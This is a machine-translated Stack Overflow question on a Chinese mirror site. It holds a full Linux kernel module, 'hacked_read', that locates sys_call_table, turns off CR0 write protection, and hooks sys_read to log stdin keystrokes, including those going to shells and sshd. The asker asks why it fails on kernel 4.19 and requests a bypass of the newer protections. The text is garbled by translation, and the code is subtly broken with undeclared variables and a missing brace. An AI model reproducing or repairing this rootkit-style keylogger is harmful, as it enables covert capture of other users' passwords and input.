linux内存隔离,c - 新Linux内核中的内存隔离，还是什么？ - SO中文参考

它是Linux内核4.12，Kali 2018.1。

现在，我已经安装了最新版本的Kali - 2019.1。它使用内核4.19：

Linux时间4.19.0-times1-amd64＃1 Debian Middle School 4.19.13-1 times1(2019-01-03)x86_64 GNU / Linux

我试图抓住任何东西，但流程中不存在fd == 0。

I've googled for a long long time, tried to read changelogs on different resources...

我发现了这样的模块kpti，可能会做类似的事情，但这个模块没有安装在Kali 2019.1中。

请帮助我找到hacked_read在这段代码中停止听到sys_read()的确切原因：

#include

#define BUFFER_SIZE 512

#define MODULE_NAME "hacked_read"

#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )

#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )

#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )

#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

MODULE_DESCRIPTION( MODULE_NAME );

MODULE_VERSION( "0.1" );

MODULE_LICENSE( "GPL" );

MODULE_AUTHOR( "module author " );

static char debug_buffer[ BUFFER_SIZE ];

unsigned long ( *original_read ) ( unsigned int, char *, size_t );

void **sct;

unsigned long icounter = 0;

static inline void rw_enable( void ) {

asm volatile ( "cli \n"

"pushq %rax \n"

"movq %cr0, %rax \n"

"andq $0xfffffffffffeffff, %rax \n"

"movq %rax, %cr0 \n"

"popq %rax " );

}

static inline uint64_t getcr0(void) {

asm volatile (

"movq %%cr0, %0\n"

:"=r"(ret)

);

return ret;

}

static inline void rw_disable( register uint64_t val ) {

asm volatile(

"movq %0, %%cr0\n"

"sti "

:"r"(val)

);

}

static void* find_sym( const char *sym ) {

static unsigned long faddr = 0; // static !!!

// ----------- nested functions are a GCC extension ---------

int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {

if( 0 == strcmp( (char*)data, sym ) ) {

faddr = addr;

return 1;

} else return 0;

};// --------------------------------------------------------

kallsyms_on_each_symbol( symb_fn, (void*)sym );

return (void*)faddr;

}

unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {

unsigned long r = 1;

if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)

return original_read( fd, buf, count );

} else {

icounter++;

if ( icounter % 1000 == 0 ) {

info( "test2 icounter = %ld\n", icounter );

info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );

}

r = original_read( fd, buf, count );

strncat( debug_buffer, buf, 1 );

if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )

debug_buffer[0] = '\0';

return r;

}

int hacked_read_init( void ) {

info( "Module was loaded\n" );

sct = find_sym( "sys_call_table" );

original_read = (void *)sct[ __NR_read ];

cr0 = getcr0();

rw_enable();

sct[ __NR_read ] = hacked_read_test;

rw_disable( cr0 );

return 0;

}

void hacked_read_exit( void ) {

info( "Module was unloaded\n" );

cr0 = getcr0();

rw_enable();

sct[ __NR_read ] = original_read;

rw_disable( cr0 );

}

module_init( hacked_read_init );

module_exit( hacked_read_exit );

Makefile文件：

CURRENT = $(shell uname -r)

KDIR = /lib/modules/$(CURRENT)/build

PWD = $(shell pwd)

TARGET = hacked_read

obj-m := $(TARGET).o

default:

$(MAKE) -C $(KDIR) M=$(PWD) modules

clean:

@rm -f *.o .*.cmd .*.flags *.mod.c *.order

@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*

@rm -fR .tmp*

@rm -rf .tmp_versions

我确信像以前一样的东西一直在调用sys_read()。 tee，bash，vi - 所有这些东西都不能在这么短的时间内改变，但是linux-kernel。

我会欣赏代码绕过。

linux内存隔离,c - 新Linux内核中的内存隔离，还是什么？ - SO中文参考 - www.soinside.com...